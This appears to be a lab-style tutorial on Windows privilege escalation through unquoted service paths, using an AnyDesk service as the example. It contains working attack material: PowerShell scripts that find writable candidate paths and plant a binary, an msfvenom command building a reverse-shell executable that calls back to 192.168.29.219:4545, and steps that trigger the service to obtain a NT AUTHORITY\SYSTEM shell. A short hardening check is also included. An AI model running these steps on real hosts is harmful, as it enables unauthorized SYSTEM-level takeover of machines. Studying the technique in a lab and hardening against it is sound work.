Windows Privilege Escalation — Unquoted Service Path
Introduction
Many Windows services are installed with a binary path that contains spaces but is not wrapped in quotes.
First, list the processes running on the system together with the services they host:
$tasklist /svc
Let’s take “AnyDesk” as an example and query the service configuration:
$sc qc AnyDesk
- As the POC above shows, BINARY_PATH_NAME is not enclosed in double quotes, so this is an unquoted service path.
- That is, the value has no double quote at its start and at its end.
But to actually exploit an unquoted service path we need a second condition: at least one space somewhere in the path.
Assume the “C:\” folder is world-writable and I create a file there named “Program.exe”.
When the service next starts, the Service Control Manager (SCM) hands the unquoted string to CreateProcess. Because nothing marks where the executable name ends and the arguments begin, CreateProcess splits the string at each space and tries each prefix with “.exe” appended, in order: first “C:\Program.exe”, then “C:\Program Files.exe”, and so on until it finds a file that exists, as the POC above shows.
This is not a kernel flaw; it is the documented behaviour of CreateProcess when it is given a command line whose executable path is not quoted. Because the SCM runs whatever file it finds first under the service’s own account (often LocalSystem), our “C:\Program.exe” runs with that account’s privileges. That is the whole flaw behind unquoted service paths.
Note that an unquoted path with spaces is not automatically exploitable: you also need write access to the directory of one of the candidate paths that is tried before the real binary.
For example, with a path such as “C:\Program Files (x86)\AnyDesk MSI\AnyDesk.exe”, the candidates are “C:\Program.exe”, “C:\Program Files.exe”, “C:\Program Files (x86)\AnyDesk.exe” and finally the real binary. “C:\” and “Program Files (x86)” are normally not writable by a standard user, but if any directory in the path is writable, you create an executable there named after the next path component (here “AnyDesk.exe” inside “Program Files (x86)”). The more spaces in the path, the more candidates there are, and the greater the chance that one of them lands in a writable directory.
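The enumeration described above, written out as an added example (not code from the original post): it reads every service’s ImagePath from the registry, keeps the unquoted ones that contain a space, expands the candidate list in the same order CreateProcess tries it, and probes which candidate directories the current user can actually write to. The exclusion of C:\Windows and the write probe are my own choices, not anything the post specifies.

```powershell
# Added example, not code from the original post: enumerate services whose
# ImagePath is unquoted and contains a space, list the candidates CreateProcess
# will try in order, and probe which candidate directories the current user
# can write to. This is the manual version of what winPEAS reports.

function Get-UnquotedPathCandidates {
    param([Parameter(Mandatory)][string]$ImagePath)
    # CreateProcess cuts the command line at each space, appends .exe and tries
    # that file; the stored value itself is the final candidate.
    $candidates = @()
    $idx = 0
    while (($idx = $ImagePath.IndexOf(' ', $idx)) -ge 0) {
        $candidates += $ImagePath.Substring(0, $idx) + '.exe'
        $idx++
    }
    $candidates += $ImagePath
    return $candidates
}

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    # Actually attempt a write: parsing the DACL by hand misses inherited and
    # group-based grants, and a failed write is exactly the answer we want.
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

# Read ImagePath straight from the registry: that raw string, quotes and
# arguments included, is what the Service Control Manager hands to CreateProcess.
$findings = foreach ($key in Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services') {
    $img = (Get-ItemProperty -LiteralPath $key.PSPath -ErrorAction SilentlyContinue).ImagePath
    if (-not $img) { continue }
    $img = [Environment]::ExpandEnvironmentVariables($img)
    # Only absolute, unquoted paths containing a space. The OS's own services
    # are skipped (assumption: C:\Windows is not user-writable on this host).
    if ($img -notmatch '^[A-Za-z]:\\' -or $img.StartsWith('"') -or $img -notmatch ' ') { continue }
    if ($img -match '^[A-Za-z]:\\Windows\\') { continue }

    $cands = @(Get-UnquotedPathCandidates $img)
    # Every candidate except the last is tried before the intended binary.
    for ($i = 0; $i -lt $cands.Count - 1; $i++) {
        [pscustomobject]@{
            Service   = $key.PSChildName
            Candidate = $cands[$i]
            Writable  = Test-DirectoryWritable (Split-Path -Parent $cands[$i])
        }
    }
}
$findings | Sort-Object Writable -Descending | Format-Table -AutoSize
```

Run it from the low-privileged shell, since the write probe must be performed as the user you actually have; a row with Writable = True is a candidate path where dropping a binary with that exact name gets it executed the next time the service starts.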
Lab Setup
Before exploiting the service, we will create the vulnerable machine ourselves and perform the exploit.
Follow the lab setup and initial-shell steps from one of the previous blogs:
There you can make the executable path vulnerable either to service-binary-path write-based privesc or to service-directory write-based privesc.
Our goal is to give write permission on a directory that one of the candidate paths falls into.
After completing the lab setup steps, make the executable path unquoted by removing the double quotes around the service’s binary path, and confirm with sc qc that BINARY_PATH_NAME now shows the bare path.
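The lab step above, as an added example (not from the original post): from an elevated PowerShell it stores the lab service’s ImagePath without quotes, checks the result, and then shows the quoted form that closes the hole. The service name and path are assumed lab values; substitute whatever you set up in the previous steps.

```powershell
# Added example, not code from the original post: from an elevated PowerShell,
# make the lab service's ImagePath unquoted, confirm it, and show the quoted
# form that closes the hole. $svc and $path are assumed lab values; substitute
# the service and binary you set up in the previous steps. Call sc.exe by its
# full name: in PowerShell, sc alone is an alias for Set-Content.
$svc  = 'AnyDesk'
$path = 'C:\Program Files (x86)\AnyDesk MSI\AnyDesk.exe'   # assumed lab path
$key  = "HKLM:\SYSTEM\CurrentControlSet\Services\$svc"

function Test-UnquotedImagePath {
    param([Parameter(Mandatory)][string]$Service)
    $img = (Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\$Service").ImagePath
    # Vulnerable pattern: no leading quote and at least one space in the value
    return (-not $img.StartsWith('"')) -and ($img -match ' ')
}

# Weak setting. The quotes on this line are consumed by the command-line parser,
# so sc.exe receives the bare path and stores it without quotes. This is exactly
# how installers create the bug by accident.
sc.exe config $svc binPath= "$path"
sc.exe qc $svc | Select-String 'BINARY_PATH_NAME'
"Unquoted: $(Test-UnquotedImagePath $svc)"

# Corrected setting: write the value with the quotes inside it. Going through
# the registry avoids the shell's quote handling entirely; the SCM reads
# ImagePath at the next start.
Set-ItemProperty -Path $key -Name ImagePath -Value ('"' + $path + '"')
sc.exe qc $svc | Select-String 'BINARY_PATH_NAME'
"Unquoted: $(Test-UnquotedImagePath $svc)"

# Put the weak setting back for the exercise:
Set-ItemProperty -Path $key -Name ImagePath -Value $path
```

The same Test-UnquotedImagePath check is what you want in a hardening script on real hosts: run it over every service key and quote any ImagePath it flags.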
Let’s perform the Windows privilege escalation attack.
We have successfully obtained the initial shell.
Now the question is: once you have an initial shell on a Windows system, what do you do first?
The first thing is to upload winPEAS, without thinking twice.
https://github.com/carlospolop/PEASS-ng/releases/download/20230910-ae32193f/winPEASx64.exe
Start a Python HTTP server on the attacker machine and download winPEAS onto the Windows system.
Now run the winPEAS binary you downloaded.
In the services section of its output, look for “Unquoted and Space detected”.
Query the service “AnyDesk” again.
As the POC above shows, BINARY_PATH_NAME is missing double quotes and contains spaces, so this is an unquoted service path.
START_TYPE is AUTO_START, i.e. the service starts at system boot. That matters: even if our user is not allowed to restart the service, a planted binary still runs as the service account at the next reboot.
So, let’s generate a payload with msfvenom on our local machine, named after the candidate path we can write to:
$msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.29.219 lport=4545 -f exe > AnyDesk.exe
Transfer the generated payload to the target machine (the same Python HTTP server works for this).
The payload is now on the target machine. If the shell you get later drops after roughly 30 seconds, it is because the SCM terminates a process that never reports back as a service within its start timeout; regenerate the payload with -f exe-service instead of -f exe to avoid that.
Now stop the service.
Start the netcat listener on the attacker machine, then start the service again.
Starting the service runs our planted AnyDesk.exe, and the listener receives a shell as
“NT AUTHORITY\SYSTEM”!!!
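The planting and triggering steps above, as one added example (not from the original post), with the checks that usually decide whether this works: the service account, whether the current user may stop and start the service, and what to do if not. The service name, payload location and target path are assumed values; $target must be one of the candidate paths derived from BINARY_PATH_NAME whose directory you can write to.

```powershell
# Added example, not code from the original post: plant the payload and trigger
# the service from the low-privileged shell, checking the things that usually
# go wrong first. $svc, $payload and $target are assumed values: $target must
# be one of the candidate paths derived from BINARY_PATH_NAME whose directory
# you can write to (here C:\Program Files (x86)\AnyDesk.exe, assuming the lab
# path C:\Program Files (x86)\AnyDesk MSI\AnyDesk.exe).
$svc     = 'AnyDesk'
$payload = "$env:TEMP\AnyDesk.exe"                  # the msfvenom binary you downloaded
$target  = 'C:\Program Files (x86)\AnyDesk.exe'

# 1. Is it worth it? The shell only inherits SYSTEM if the service account is
#    LocalSystem, and Auto start mode gives you a reboot as a fallback trigger.
$cfg = Get-CimInstance Win32_Service -Filter "Name='$svc'"
"{0}: account={1} startmode={2} state={3}" -f $cfg.Name, $cfg.StartName, $cfg.StartMode, $cfg.State
"ImagePath: $($cfg.PathName)"

# 2. Can this user stop and start it? In the service SDDL, RP is SERVICE_START
#    and WP is SERVICE_STOP; look for them in the entry for AU (Authenticated
#    Users), BU (Users) or IU (Interactive).
$sddl = ((sc.exe sdshow $svc) -join '').Trim()
"Service DACL: $sddl"

# 3. Plant the payload. A failure here means the directory is not writable
#    after all and this candidate is a dead end.
Copy-Item -LiteralPath $payload -Destination $target -ErrorAction Stop
"Planted $target"

# 4. Trigger. Have the listener (nc -lvnp 4545) running before this point.
try {
    if ($cfg.State -eq 'Running') { Stop-Service -Name $svc -Force -ErrorAction Stop }
    Start-Service -Name $svc -ErrorAction Stop
} catch {
    Write-Warning "Service control failed: $($_.Exception.Message)"
    # A timeout (error 1053) on start is expected with a plain msfvenom exe: it
    # never reports to the SCM, but the reverse shell has already connected by
    # then. Access denied means you lack the rights checked in step 2; with
    # start mode Auto the payload still runs at the next boot, so reboot if
    # you are allowed to (shutdown /r /t 0) or wait.
}
```

Checking the DACL before calling Stop-Service is the part most write-ups skip: on hardened builds a standard user often has SERVICE_QUERY_CONFIG but neither SERVICE_STOP nor SERVICE_START, and then the only trigger left is the AUTO_START at reboot that the sc qc output above told you about.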